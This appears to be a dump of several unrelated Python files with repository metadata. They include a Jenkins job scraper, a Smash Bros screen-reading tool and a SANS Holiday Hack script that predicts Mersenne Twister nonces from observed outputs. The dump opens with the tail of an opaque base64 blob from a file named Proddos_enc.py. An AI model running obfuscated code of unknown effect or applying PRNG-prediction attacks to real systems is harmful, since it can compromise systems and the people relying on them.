Mk5XUm5KbFJscFhVbFZ3VGxaVVJsZFVNVVp6WWpOa2FWSldTbE5aYlhSTFlVWnNWMVpyZEU1TlYzaDRWa2QwTUZSc1NsaGxSVnBWVmxaS2VsVXllRXRTTWtWNllVWldhVkpyY0ZCV1JsWldUbGRLY2sxVldtdFNXRUpUVkZWV1lXUldWWGhXYXpsU1lrYzVNMWxyVm5OVmJVcHpZMGhHV21KWWFFaFpiWGhYVWpGU2NsTnRlRkpOUjNnelZYcEdSazlXUWxSVFdFSk1WVlF3T1VscGEzQWlLU2s9Iikp"))"))
Python
12
31.75
51
/Proddos_enc.py
0.545918
0.482143
kratikagupta-developer/NewsLetter-SignupApp
refs/heads/master
# your code goes here import collections T = int(input()) print (T) while T>0: n,g,m = map(int,input().split()) print (n,g,m) dict = collections.defaultdict(set) c = 1 ### guest no. t = 1 li = [-1] while c <=g: h,direction = input().split() print (h,direction) h = int(h) #h,direction = astr.split() li.append((h,direction)) dict[h].add(c) print (dict) c+=1 while t<=m: c = 1 temp_d = collections.defaultdict(set) while c<=g: h,direction = li[c] h = int(h) if direction == 'C': end = (h+1)%n else: end = (h-1) if end<=0: ####3 end = n+end temp_d[end].add(c) c+=1 for i,v in temp_d.items(): dict[i].union(v) ################ t+=1 dict2 = collections.OrderedDict() for i,v in dict.items(): for elem in v: if elem not in dict2: dict2[elem]=1 else: dict2[elem]+=1 li1 = [] print (dict2) for i in range(g+1): if i+1 in dict2: li1.append(dict2[i+1]) print (li1) T-=1
Python
55
22.709091
45
/Untitled-1.py
0.409509
0.388037
mendedsiren63/2020_Sans_Holiday_Hack_Challenge
refs/heads/main
#!/usr/bin/python3 import os main_nonce="nonce" obj_file_new_nonce="obj_new_nonce_624" cmd_cut='cat nonce | tail -312 > obj_nonce_312' nonce_combined_list=[] def split_nonce(): os.system(cmd_cut) #This block will cut 312 nonce from main file and put in last nonce_312 file_nonce="obj_nonce_312" with open(file_nonce, "r") as file: # Calculate hi and lo 32 bit of 64 bit nonce. for line in file.readlines(): line=int(line) highint = line >> 32 #hi lowint = line & 0xffffffff #lo with open (obj_file_new_nonce, 'a') as file: #Add nonces to a new file making it 624 values. file.write(str(lowint)+'\n') with open(obj_file_new_nonce, 'a') as file: file.write(str(highint)+'\n') def predict(): try: os.system('cat obj_new_nonce_624 | mt19937predict | head -20 > obj_pred_10.txt') # Using Kmyk's Mersenne twister Predictor except Exception as e: # This will through a broken pipe exception but it will successfully predict 10 next nonces pass with open('obj_pred_10.txt', 'r') as file: nonce_array = file.readlines() for i,j in zip(range(0,len(nonce_array),2), range(129997,130007)): # if i <len(nonce_array)-1: nonce_lo=int(nonce_array[i]) # Converting back to 64 bit. nonce_hi=int(nonce_array[i+1]) nonce_combined=(nonce_hi <<32) + nonce_lo hex_nonce=hex(nonce_combined) print("Predicted nonce at",j,"is:", nonce_combined, " [ Hex value:",hex_nonce,"]") #Printing the nones and their hex value split_nonce() predict()
Python
43
34.279068
127
/Bitcoin-Investigation/process_nonce_obj_11a.py
0.664915
0.622208
remiljw/Python-Script
refs/heads/master
import requests import jenkins from sqlalchemy import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker import datetime Base = declarative_base() def connectToJenkins(url, username, password): server = jenkins.Jenkins(url, username=username, password=password) return server def initializeDb(): engine = create_engine('sqlite:///cli.db', echo=False) session = sessionmaker(bind=engine)() Base.metadata.create_all(engine) return session def addJob(session, jlist): for j in jlist: session.add(j) session.commit() def getLastJobId(session, name): job = session.query(Jobs).filter_by(name=name).order_by(Jobs.jen_id.desc()).first() if (job != None): return job.jen_id else: return None class Jobs(Base): __tablename__ = 'Jobs' id = Column(Integer, primary_key = True) jen_id = Column(Integer) name = Column(String) timeStamp = Column(DateTime) result = Column(String) building = Column(String) estimatedDuration = Column(String) def createJobList(start, lastBuildNumber, jobName): jList = [] for i in range(start + 1, lastBuildNumber + 1): current = server.get_build_info(jobName, i) current_as_jobs = Jobs() current_as_jobs.jen_id = current['id'] current_as_jobs.building = current['building'] current_as_jobs.estimatedDuration = current['estimatedDuration'] current_as_jobs.name = jobName current_as_jobs.result = current['result'] current_as_jobs.timeStamp = datetime.datetime.fromtimestamp(long(current['timestamp'])*0.001) jList.append(current_as_jobs) return jList url = 'http://locahost:8080' username = input('Enter username: ') password = input('Enter password: ') server = connectToJenkins(url, username, password) authenticated = false try: server.get_whoami() authenticated = true except jenkins.JenkinsException as e: print ("Authentication error") authenticated = false if authenticated: session = initializeDb() # get a list of all jobs jobs = server.get_all_jobs() for j in jobs: jobName = j['name'] # get job name #print jobName lastJobId = getLastJobId(session, jobName) # get last locally stored job of this name lastBuildNumber = server.get_job_info(jobName)['lastBuild']['number'] # get last build number from Jenkins for this job # if job not stored, update the db with all entries if lastJobId == None: start = 0 # if job exists, update the db with new entrie else: start = lastJobId # create a list of unadded job objects jlist = createJobList(start, lastBuildNumber, jobName) # add job to db addJob(session, jlist)
Python
94
29.404255
129
/jenkins_jobs.py
0.662351
0.658502
badgerlordy/smash-bros-reader
refs/heads/master
import argparse import cv2 import difflib import json import matplotlib.pyplot as plt import mss import numpy as np import os import re import requests import select import smash_game import smash_utility as ut import socket import struct import threading from queue import Empty, Queue #from matplotlib import pyplot as plt from PIL import Image, ImageChops, ImageDraw BASE_DIR = os.path.realpath(os.path.dirname(__file__)) CAPTURES_DIR = os.path.join(BASE_DIR, 'captures') if not os.path.isdir(CAPTURES_DIR): os.mkdir(CAPTURES_DIR) def post_fake(data={'mode': 1, 'game': {'players': []}}): ut.post_data(data) def test_pixel(): img = Image.open('1560221662.467294.png') img = ut.filter_color2(img, (0, 10)) p = plt.imshow(img) plt.show() def test_stencil(): img = Image.open('1560219739.917792.png') ut.stencil(img) def test_game_data(): with open('game_state.json', 'r') as infile: game = json.load(infile) ut.filter_game_data(game, 1) def req(message='No message'): URL = 'http://localhost:8000/reader_info/' DATA = { 'secret_code': 'Mj76uiJ*(967%GVr57UNJ*^gBVD#W4gJ)ioM^)', 'data': message } r = requests.post(url = URL, json = DATA) return r class KeyThread(threading.Thread): def __init__(self, *args, **kwargs): super().__init__() self.key = keyboard.KeyCode(char='g') def run(self): with keyboard.Listener(on_press=self.on_press) as listener: listener.join() def on_press(self, key): if key == self.key: print('test') def start_key_thread(): thread = KeyThread() thread.daemon = True thread.start() def fight_tester(): captures = os.listdir(CAPTURES_DIR) get_fight_num = lambda f: re.match('\d+', f).group() fight_nums = list({get_fight_num(f) for f in captures}) fight_nums.sort(key=lambda n: int(n)) # n = fight_nums[int(random.random() * len(fight_nums))] # n = '0001' modes = {} for i, n in enumerate(fight_nums[16:]): print(f'{"*" * 80}\n{n}') card_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.2.LOBBY_CARDS.png')) fight_start_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.3.FIGHT_START.png')) # fight_end_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.4.FIGHT_END.png')) # try: # fight_results_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.5.FIGHT_RESULTS_SOLO.png')) # except FileNotFoundError: # fight_results_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.5.FIGHT_RESULTS_TEAM.png')) game = smash_game.Game(1) game.read_card_screen(card_screen) if game.mode in modes: modes[game.mode].append(i) else: modes[game.mode] = [i] break for mode in modes: print(f'{mode}: {modes[mode]}') game.read_start_screen(fight_start_screen) print(game.serialize(images_bool=False)) # game.fix_colors(fight_start_screen) # game.read_end_screen(fight_end_screen) # game.read_results_screen(fight_results_screen) # print(str(game)) # with open('game.json', 'w+') as outfile: # json.dump(game.serialize(), outfile, separators=(',',':')) def crop_char_lobby(): cap = ut.capture_screen() game = smash_game.Game(1) game.player_count = 4 game.read_cards(cap) def crop_char_game(): cap = ut.capture_screen() game = smash_game.Game(1) game.player_count = 3 name_images = game.get_character_name_game(cap) for img in name_images: bw, _ = ut.convert_to_bw(img) name_as_read = ut.read_image(bw).lower() name = difflib.get_close_matches(name_as_read, smash_game.CHARACTER_NAMES, n=1) print(name) def filter(): plt.ion() while True: cap = ut.capture_screen() img = ut.filter_color(cap, [236, 236, 236]) plt.imshow(img) plt.pause(0.001) plt.show() def cropper(coord_name, name=None): coords = ut.COORDS['FINAL'][coord_name] capture = ut.capture_screen() crop = capture.crop(coords) if name: crop.save(f'{name}.png') else: return np.asarray(crop) # crop.show() def capture_screen(): with mss.mss() as sct: # Get rid of the first, as it represents the "All in One" monitor: #for num, monitor in enumerate(sct.monitors[1:], 1): monitor = sct.monitors[1] # Get raw pixels from the screen sct_img = sct.grab(monitor) # Create the Image img = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX') # The same, but less efficient: # img = Image.frombytes('RGB', sct_img.size, sct_img.rgb) num = 0 name = os.path.join(home, 'screens', f'{num}.png') while os.path.isfile(name): num += 1 name = os.path.join(home, 'screens', f'{num}.png') return img def get_stream(): port = 9999 # where do you expect to get a msg? bufferSize = 2048 # whatever you need s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind(('', port)) s.setblocking(0) if True: result = select.select([s],[],[]) msg = result[0][0].recv(bufferSize) print(msg) cap = ImageGrab.grab() cv2.imdecode(cap, flags=1) def get_stream2(): HOST = '' PORT = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print('Socket created') s.bind((HOST, PORT)) print('Socket bind complete') s.listen(10) print('Socket now listening') conn, addr = s.accept() while True: data = conn.recv(8192) nparr = np.fromstring(data, np.uint8) frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR) cv2.imshow('frame', frame) time.sleep(2) def get_stream3(): MCAST_GRP = '224.1.1.1' MCAST_PORT = 9999 IS_ALL_GROUPS = True sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if IS_ALL_GROUPS: # on this port, receives ALL multicast groups sock.bind(('', MCAST_PORT)) else: # on this port, listen ONLY to MCAST_GRP sock.bind((MCAST_GRP, MCAST_PORT)) mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY) sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) while True: print(sock.recv(10240)) def get_stream_data(main_queue, image_queue): print('Getting stream data') cap = cv2.VideoCapture('udp://224.0.0.1:2424', cv2.CAP_FFMPEG) print(cap) if not cap.isOpened(): print('VideoCapture not opened') exit(-1) x = 0 while True: print('cap') image_queue.put(cap) print('put') item = get_queue(main_queue) if item == 'end': break cap.release() cv2.destroyAllWindows() def convert_to_bw(pil_img, threshold=127): cv_img = np.array(pil_img) img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY) thresh, array_bw = cv2.threshold(img_gray, threshold, 255, cv2.THRESH_BINARY_INV) pil_bw = Image.fromarray(array_bw) return pil_bw, array_bw def compare(): imgs = os.listdir(os.path.join(home, 'flags')) [print(f'{str(i+1).rjust(2)}. {img}') for i, img in enumerate(imgs)] #x = 0 while True: first = int(input('one>: ')) img1 = Image.open(os.path.join(home, 'flags', imgs[first-1])) print(img1) second = int(input('two>: ')) img2 = Image.open(os.path.join(home, 'flags', imgs[second-1])) print(img2) #small, large = sorted([img1, img2], key=lambda img: img.size[0]) copy1 = img1.resize((64, 64)) copy2 = img2.resize((64, 64)) bw1, arr1 = convert_to_bw(copy1) bw2, arr2 = convert_to_bw(copy2) diff = ImageChops.difference(bw1, bw2) diff.show() arr = np.asarray(diff) total = 0 different = 0 for row in arr: for pixel in row: total += 1 if pixel == 255: different += 1 sim = ((1 - (different/total)) * 100) print(sim) if sim < 98: print('different flag') else: print('same flag') #diff.save(f'diff-{x}.jpg') #x += 1 def get_queue(queue): try: item = queue.get(block=False) return item except Empty: return None class ImageProcessingThread(threading.Thread): def __init__(self, main_queue, queue): super().__init__() self.queue = queue self.main_queue = main_queue self.x = 0 print('Image processing thread started') def run(self): while True: cap = get_queue(self.queue) if cap: self.process_frame(cap) def process_frame(self, cap): ret, frame = cap.read() if not ret: print('frame empty') main_queue.put('end') flipped = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) img = Image.fromarray(flipped) img.save(os.path.join('test', f'{self.x}.jpg')) self.x += 1 #cv2.imshow('image', frame) if cv2.waitKey(1)&0XFF == ord('q'): main_queue.put('end') pass def thread_test(): main_queue = Queue() processing_queue = Queue() processing_thread = ImageProcessingThread(main_queue, processing_queue) processing_thread.daemon = True processing_thread.start() print('test') get_stream_data(main_queue, processing_queue) def ocr_test(): # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-i", "--image", required=True, help="path to input image to be OCR'd") ap.add_argument("-p", "--preprocess", type=str, default="thresh", help="type of preprocessing to be done") args = vars(ap.parse_args()) # load the example image and convert it to grayscale image = cv2.imread(args["image"]) gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # check to see if we should apply thresholding to preprocess the # image if args["preprocess"] == "thresh": gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1] # make a check to see if median blurring should be done to remove # noise elif args["preprocess"] == "blur": gray = cv2.medianBlur(gray, 3) # write the grayscale image to disk as a temporary file so we can # apply OCR to it #filename = "{}.png".format(os.getpid()) #cv2.imwrite(filename, gray) pil_gray = Image.fromarray(gray) # load the image as a PIL/Pillow image, apply OCR, and then delete # the temporary file text = pytesseract.image_to_string(pil_gray) #os.remove(filename) print(text) # show the output images cv2.imshow("Image", image) cv2.imshow("Output", gray) cv2.waitKey(0) def game_color(): game = smash_game.Game() game.player_count = 4 img = Image.open(os.path.join('captures', '0001.3.FIGHT_START.png')) for edge in ut.COORDS['GAME']['PLAYER']['INFO'][game.player_count]: color_coords = list(ut.COORDS['GAME']['PLAYER']['COLOR']) color_coords[0] = edge - color_coords[0] color_coords[2] = edge - color_coords[2] crop = img.crop(color_coords) print(ut.match_color(pixel=crop, mode='GAME')) if __name__ == '__main__': #ocr_test() #fight_tester() #test_game_data() #test_stencil() #fight_tester() game_color() pass
Python
440
25.661364
108
/smash_reader/tests.py
0.590913
0.570199
badgerlordy/smash-bros-reader
refs/heads/master
import cv2 from datetime import datetime import json from logger import log_exception import matplotlib.pyplot as plt import mss import numpy as np from PIL import Image, ImageChops, ImageDraw import pytesseract import random import requests from skimage.measure import compare_ssim import string import subprocess import os import sys import time sys.excepthook = log_exception output = True def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<Utility>') print(*args, **kwargs) BASE_DIR = os.path.realpath(os.path.dirname(__file__)) TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates') override_path = os.path.join(BASE_DIR, 'index.txt') if os.path.isfile(override_path): with open(override_path, 'r') as infile: MONITOR_INDEX = int(infile.read()) else: MONITOR_INDEX = 1 COORDS = { 'LOBBY': { 'BASIC_ID': (145, 32, 321, 70), 'FLAGS_ID': (394, 291, 1525, 433), 'CARDS_ID': (671, 152, 1247, 188), 'GAME_INFO': (302, 217, 1443, 253), 'CHARACTER_TEMPLATE': (144, 126, 206, 218), 'CARDS_SLICE_IDS': (0, 877, 1920, 878), 'CARDS_SLICE_COLORS': (0, 813, 1920, 814), 'PLAYER': { 'TEAM_COLOR': (17, 458, 18, 459), 'CHARACTER_NAME': (0, 367, 396, 430), 'NAME': (129, 436, 389, 475), 'NUMBER': (37, 441, 82, 471), 'GSP': (131, 490, 384, 526) } }, 'GAME': { 'TIMER_PREGAME': (1722, 61, 1798, 89), 'TIMER_VISIBLE': (1703, 63, 1715, 95), 'TIMER_MILLI': ( (1823, 70, 1831, 92), (1850, 70, 1858, 92) ), 'TIMER_MINUTE': (1675, 54, 1686, 91), 'TIMES_UP': (465, 299, 1451, 409), 'SUDDEN_DEATH': (340, 172, 1602, 345), 'END_ID': (411, 462, 1481, 522), 'PLAYER': { 'INFO': { 2: (712, 1451), 3: (457, 1081, 1705), 4: (491, 899, 1307, 1715) }, 'STOCK_TEMPLATE': (223, 1045, 221, 1059), 'CHARACTER_TEMPLATE': (272, 950, 242, 1020), 'NAME': (182, 1007, 0, 1025), 'COLOR': (5, 1003, 4, 1004) } }, 'FINAL': { 'ID': ( (468, 49, 550, 296), (204, 388, 286, 635) ), 'ID2': (1825, 0, 1864, 73), 'VICTORY_TEAM': (745, 870, 833, 978), 'VICTORY_PLAYER': (125, 168, 126, 169), '2ND_PLACE': (525, 982, 526, 983), '2ND_PLACE_2_PLAYER': (690, 984, 691, 985), '3RD_PLACE': (1072, 1003, 1073, 1004), '4TH_PLACE': (1492, 1013, 1493, 1014) }, 'MENU': { 'FAILED_TO_PLAY_REPLAY': (724, 408, 1185, 485), 'SPECTATE_SELECTED': (979, 458, 1586, 606) } } COLORS = { 'CARDS':{ 'RED': (250, 52, 52), 'BLUE': (43, 137, 253), 'YELLOW': (248, 182, 16), 'GREEN': (35, 179, 73) }, 'GAME': { 'RED': (255, 42, 40), 'BLUE': (31, 141 ,255), 'YELLOW': (255, 203, 0), 'GREEN': (22, 193, 64) }, 'RESULTS': { 'RED': (240, 159, 163), 'BLUE': (125, 206, 254), 'YELLOW': (255, 244, 89), 'GREEN': (141, 212, 114) } } folders = [f for f in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, f))] TEMPLATES = {f.upper():{} for f in folders} for root, dirs, files in os.walk(TEMPLATES_DIR, topdown=False): for file in files: path = os.path.join(root, file) name = os.path.splitext(file)[0] _type = os.path.split(root)[1].upper() if _type in TEMPLATES: TEMPLATES[_type][name] = Image.open(path) else: TEMPLATES[_type] = {name: Image.open(path)} def save_settings(settings): lines = [f'{k}={v}' for k, v in settings.items()] open('settings.txt', 'w+').write('\n'.join(lines)) def load_settings(): path = os.path.join(BASE_DIR, 'settings.txt') if os.path.isfile(path): lines = open(path, 'r').read().splitlines() settings = {} for line in lines: k, v = line.split('=') settings[k] = v else: key_path = os.path.join(BASE_DIR, 'key.txt') key = '' if os.path.isfile(key_path): key = open(key_path, 'r').read().splitlines()[0] os.remove(key_path) settings = { 'API_KEY': key, 'POST_URL': 'https://www.smashbet.net/reader_post/', 'AUTO_START_WATCHER': 'true' } save_settings(settings) return settings SETTINGS = load_settings() ##################################################################### ############################# DECORATORS ############################ ##################################################################### def time_this(func): def wrapper(*args, **kwargs): start_time = time.time() result = func(*args, **kwargs) end_time = time.time() duration = end_time - start_time dur_str = '{:.2f}'.format(duration) _print(f'function: {func.__name__}() executed in {dur_str} seconds') return result return wrapper # Make sure function runs at least as long as the set interval def pad_time(interval): def outer(func): def inner(*args, **kwargs): start_time = time.time() result = func(*args, **kwargs) end_time = time.time() duration = end_time - start_time delta = interval - duration if delta > 0: # print(f'padding {delta} seconds') time.sleep(delta) else: # print(f'detection has fallen behind by [{"{:.2f}".format(delta)}] seconds') pass return result return inner return outer ##################################################################### ########################## IMAGE CAPTURING ########################## ##################################################################### def save_frames(vid_path, framerate=None): print('saving template in 5 seconds') time.sleep(5) vid_cap = cv2.VideoCapture(vid_path) success = True frame_index = 0 while success: vid_cap.set(cv2.CAP_PROP_POS_FRAMES, frame_index) success, image = vid_cap.read() _print(f'Read frame {frame_index}: ', success) cv2.imwrite(f'frame{frame_index}.png', image) # save frame as JPEG file frame_index += 30 # @time_this def capture_screen(monitor_index=MONITOR_INDEX): with mss.mss() as sct: monitor_count = len(sct.monitors) if monitor_index > monitor_count: monitor_index = monitor_count monitor = sct.monitors[monitor_index] sct_img = sct.grab(monitor) pil_img = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX') return pil_img def capture_cards_id(): coords = COORDS['LOBBY']['CARDS_ID'] cap = capture_screen() crop = cap.crop(coords) if 'CARDS_ID' in TEMPLATES['LOBBY']: del TEMPLATES['LOBBY']['CARDS_ID'] crop.save(os.path.join(TEMPLATES_DIR, 'lobby', 'CARDS_ID.png')) TEMPLATES['LOBBY']['CARDS_ID'] = crop ##################################################################### ########################## IMAGE PROCESSING ######################### ##################################################################### def read_image(image, config_type='basic'): configs = { 'basic': '--psm 6 --oem 3', 'gsp': '--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789,', 'player_number': '--psm 8 --oem 3 -c tessedit_char_whitelist=p1234' } text = pytesseract.image_to_string(image, config=configs[config_type]) return text def convert_to_bw(pil_img, threshold=127, inv=True): cv_img = np.array(pil_img) try: img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY) if inv: method = cv2.THRESH_BINARY_INV else: method = cv2.THRESH_BINARY thresh, array_bw = cv2.threshold(img_gray, threshold, 255, method) pil_bw = Image.fromarray(array_bw) return pil_bw, array_bw except cv2.error: return pil_img, cv_img def find_most_similar(sample, templates, thresh=0): high_sim = ['', 0] for template_name in templates: sim = avg_sim(sample, templates[template_name]) if sim > high_sim[1]: high_sim = [template_name, sim] if thresh and sim > thresh: return high_sim return high_sim def compare_chops(sample, template, true_color=False): if sample.size == template.size: copy1 = sample.resize((64, 64)) copy2 = template.resize((64, 64)) if not true_color: copy1, arr1 = convert_to_bw(copy1) copy2, arr2 = convert_to_bw(copy2) diff = ImageChops.difference(copy1, copy2) arr = np.asarray(diff) total = 0 different = 0 for row in arr: for pixel in row: total += 1 if isinstance(pixel, (int, np.uint8)): if pixel == 255: different += 1 else: for color in pixel: different += (color / 255) sim = ((1 - (different/total)) * 100) return sim return 0 def compare_skim(sample, template, true_color=False): if sample.size == template.size: copy1 = sample.resize((64, 64)) copy2 = sample.resize((64, 64)) if not true_color: try: sample = cv2.cvtColor(np.array(sample), cv2.COLOR_BGR2GRAY) except cv2.error: sample = np.array(sample) try: template = cv2.cvtColor(np.array(template), cv2.COLOR_BGR2GRAY) except cv2.error: template = np.array(template) # Image is already b&w sim, diff = compare_ssim(sample, template, full=True, multichannel=True) return sim * 100 return 0 def area_sim(cap, screen, area): template = TEMPLATES[screen][area] coords = COORDS[screen][area] if not isinstance(coords[0], (list, tuple)): coords = [coords] high_sim = 0 for coord in coords: crop = cap.crop(coord) sim = avg_sim(crop, template) if sim > high_sim: high_sim = sim return high_sim def avg_sim(sample, template, true_color=False): comp_funcs = (compare_chops, compare_skim) sims = [comp_func(sample, template, true_color) for comp_func in comp_funcs] avg = sum(sims) / len(sims) return avg def match_color(pixel=None, arr=[], mode=None): best_match = ('', 0) if not mode: _print('mode required for color match') return best_match if pixel: sample = [rgb for row in np.asarray(pixel) for rgb in row][0] elif any(arr): sample = arr else: _print('no sample') return best_match colors = COLORS[mode] for color_name in colors: diff = 0 for sv, tv in zip(sample, colors[color_name]): diff += abs(sv - tv) sim = 100 - ((diff / 765) * 100) if sim > best_match[1]: best_match = (color_name, sim) return best_match def stencil(crop): w_pil, w_arr = convert_to_bw(crop, 254, inv=False) b_pil, _ = convert_to_bw(crop, 1, inv=False) b_fil = b_pil.copy() fill_border(b_fil) b_arr = np.array(b_fil) result = [] for r1, r2 in zip(w_arr, b_arr): r = [] for p1, p2 in zip(r1, r2): if int(p1) and int(p2): r.append(0) else: r.append(255) result.append(r) arr = np.array(result) img = Image.fromarray(arr.astype('uint8')) imgs = [crop, w_pil, b_pil, b_fil, img] return imgs def fill_border(img): while True: arr = np.array(img) row_count = len(arr) for row_i, row in enumerate(arr): col_count = len(row) for p_i, p in enumerate(row): if int(p): if row_i == 0 or row_i == row_count \ or p_i == 0 or p_i == col_count: ImageDraw.floodfill(img, (p_i, row_i), 0) continue break def filter_color(image, color): color = np.uint8([[color]]) hsv = cv2.cvtColor(color, cv2.COLOR_RGB2HSV) darker = np.array([hsv[0][0][0] - 10, 50, 50]) lighter = np.array([hsv[0][0][0] + 10, 360, 360]) image = np.asarray(image) hsv = cv2.cvtColor(image, cv2.COLOR_RGB2HSV) mask = cv2.inRange(hsv, darker, lighter) result = cv2.bitwise_and(image, image, mask=mask) return result def filter_color2(img, coords): arr = np.array(img) x, y = coords pixel = list(arr[y][x]) result = [] for row in arr: r = [] for p in row: if list(p) == pixel: r.append(255) else: r.append(0) result.append(r) return result def rgb_to_hex(rgb): return '#%02x%02x%02x' % rgb ##################################################################### ################################ MISC ############################### ##################################################################### def simplify_players(game): players = [] for team in game['teams']: color = team['color'] for player in team['players']: keys = list(player.keys()) for key in keys: if not player[key]: del player[key] if 'character_name' in player: player['character_name'] = player['character_name'].title() player['color'] = color players.append(player) return players def filter_game_data(game, mode): simple_game = {'reader_mode': mode} if mode == 1: simple_game['players'] = simplify_players(game) simple_game['map'] = game['map'] simple_game['team_mode'] = game['team_mode'] simple_game['game_mode'] = game['mode'] simple_game['cancelled'] = game['cancelled'] if mode == 2: if not game['team_mode']: simple_game['colors_changed'] = game['colors_changed'] if game['colors_changed']: for team in game['teams']: simple_game['players'] = simplify_players(game) if mode == 3: simple_game['start_time'] = -1 if mode == 4: simple_game['end_time'] = -1 if mode == 5: simple_game['winning_team'] = game['winning_color'] return simple_game def post_data(data={}): key = SETTINGS['API_KEY'] URL = SETTINGS['POST_URL'] DATA = { 'API_KEY': key, 'data': data } try: r = requests.post(url=URL, json=DATA) return r except requests.exceptions.ConnectionError: print('Unable to reach REST API') return None def dump_image_data(arr): filepath = os.path.join(BASE_DIR, 'img_dump.json') if os.path.isfile(filepath): with open(filepath, 'r') as infile: data = json.load(infile) else: data = [] data.append({time.time(): arr}) with open(filepath, 'w+') as outfile: json.dump(data, outfile) def clear_console(): try: none = os.system('cls') except: pass try: none = os.system('clear') except: pass def save_game_data(game): data = load_game_data() data.append(game) with open('games.json', 'w+') as outfile: json.dump(data, outfile, separators=(',',':')) def load_game_data(): path = os.path.join(BASE_DIR, 'games.json') if os.path.isfile(path): try: with open(path, 'r') as infile: return json.load(infile) except json.decoder.JSONDecodeError: pass return [] def send_command(btn): _print('PRESS', btn) os.system(f'PIGPIO_ADDR=raspberrypi.local python3 /home/badgerlord/Desktop/{btn}.py') def random_str(l=10): """Generate a random string of letters, digits and special characters """ password_characters = string.ascii_letters + string.digits return ''.join(random.choice(password_characters) for i in range(l))
Python
554
28.64621
97
/smash_reader/smash_utility.py
0.513699
0.467791
badgerlordy/smash-bros-reader
refs/heads/master
import copy import difflib import json from logger import log_exception import numpy as np import os from PIL import Image import re import smash_utility as ut import sys import threading import time sys.excepthook = log_exception character_name_debugging_enabled = False output = True def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<Game>') print(*args, **kwargs) CARD_WIDTH = 398 STOCK_SPACING = 26 with open('fighter_list.json', 'r') as infile: CHARACTER_NAMES = json.load(infile) CHARACTER_NAMES = [name.lower() for name in CHARACTER_NAMES] BASE_DIR = os.path.realpath(os.path.dirname(__file__)) CHARACTER_NAME_FIXES = { 'lemmy': 'lenny', 'lemmv': 'lenny' } MAP_NAME_FIXES = { 'Figure-S': 'Figure-8', 'HiII': 'Hill' } class ImageProcessor(threading.Thread): def __init__(self): pass class Player: def __init__(self): self.player_name_image = [] self.character_name = '' self.number = 0 self.gsp = 0 self.stock_template_image = [] self.stock_count = 0 def serialize(self, images_bool=True): _copy = copy.copy(self) img = _copy.player_name_image.tolist() for i, row in enumerate(img): img[i] = [int(bool(pixel)) for pixel in img[i]] if not images_bool: _copy.player_name_image = None _copy.stock_template_image = None else: if len(_copy.player_name_image): _copy.player_name_image = _copy.player_name_image.tolist() if len(_copy.stock_template_image): _copy.stock_template_image = _copy.stock_template_image.tolist() return _copy.__dict__ def read_card(self, card): self.get_character_name(card) self.crop_player_name(card) self.read_number(card) self.read_gsp(card) # @ut.time_this def get_character_name(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['CHARACTER_NAME']) pils = ut.stencil(crop) pil = pils[-1] template_name, sim = ut.find_most_similar(pil, ut.TEMPLATES['CHARACTER_NAMES']) if sim > 95: self.character_name = re.match('(.+)(-\d*)', template_name).group(1) else: name_as_read = ut.read_image(pil).lower() if name_as_read in CHARACTER_NAME_FIXES: name_as_read = CHARACTER_NAME_FIXES[name_as_read] name = difflib.get_close_matches(name_as_read, CHARACTER_NAMES, n=1) if len(name): name = name[0] if character_name_debugging_enabled: _template_name, _sim = ut.find_most_similar(pil, ut.TEMPLATES['CHARACTER_NAMES_DUMP']) if _sim < 99: num = 1 for _name in ut.TEMPLATES['CHARACTER_NAMES_DUMP']: _print(name, _name) if name in _name: num += 1 filename = f'{name}-{num}.png' path = os.path.join(BASE_DIR, 'templates', 'character_names_dump', filename) pil.save(path) self.character_name = name else: self.character_name = '...' template, sim = ut.find_most_similar(pil, ut.TEMPLATES['CHARACTER_NAMES'], thresh=95) if sim >= 95: self.character_name = template.split('-')[0] else: template, sim = ut.find_most_similar(pil, ut.TEMPLATES['UNREADABLE'], thresh=95) if sim < 95: nums = list(ut.TEMPLATES['UNREADABLE'].keys()) if len(nums): nums.sort(key=lambda num: int(num), reverse=True) num = int(nums[0]) + 1 else: num = 1 filename = f'{num}.png' ut.TEMPLATES['UNREADABLE'][num] = pil pil.save(os.path.join(ut.TEMPLATES_DIR, 'unreadable', filename)) _print(f'{name_as_read.rjust(30)} --> {self.character_name}') if False: for i, img in enumerate(pils): img.save(f'misc/character_names/{self.character_name}-{i}.png') # @ut.time_this def crop_player_name(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['NAME']) img, self.player_name_image = ut.convert_to_bw(crop, 120, False) # @ut.time_this def read_number(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['NUMBER']) # crop.save(f'{time.time()}.png') templates = {t:ut.TEMPLATES['LOBBY'][t] for t in ut.TEMPLATES['LOBBY'] if re.match('P\d+', t)} template_name, sim = ut.find_most_similar(crop, templates) num = int(os.path.splitext(template_name)[0].split('P')[1]) # pil, arr = convert_to_bw(crop, 1, False) # num = read_image(pil, 'player_number')[-1] # self.number = int(num) self.number = num # 